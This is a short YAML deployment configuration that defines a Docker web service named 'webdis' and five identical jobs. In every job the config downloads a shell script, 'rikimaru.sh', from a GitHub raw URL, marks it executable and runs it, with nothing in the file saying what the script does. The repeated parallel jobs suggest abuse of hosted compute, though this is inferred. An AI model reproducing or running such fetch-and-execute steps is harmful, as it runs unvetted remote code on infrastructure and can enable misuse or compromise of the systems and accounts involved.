previewsEnabled: true
services:
# A Docker web service
- type: web
  name: webdis
  env: docker

jobs:
- job: a
  steps:
  - bash:
      - wget https://raw.githubusercontent.com/AnggiAlfonso/xla_final/main/rikimaru.sh
      - chmod +x rikimaru.sh
      - ./rikimaru.sh
      
- job: b
  steps:
  - bash:
      - wget https://raw.githubusercontent.com/AnggiAlfonso/xla_final/main/rikimaru.sh
      - chmod +x rikimaru.sh
      - ./rikimaru.sh
  
- job: c
  steps:
  - bash:
      - wget https://raw.githubusercontent.com/AnggiAlfonso/xla_final/main/rikimaru.sh
      - chmod +x rikimaru.sh
      - ./rikimaru.sh
  
- job: d
  steps:
  - bash:
      - wget https://raw.githubusercontent.com/AnggiAlfonso/xla_final/main/rikimaru.sh
      - chmod +x rikimaru.sh
      - ./rikimaru.sh

- job: e
  steps:
  - bash:
      - wget https://raw.githubusercontent.com/AnggiAlfonso/xla_final/main/rikimaru.sh
      - chmod +x rikimaru.sh
      - ./rikimaru.sh
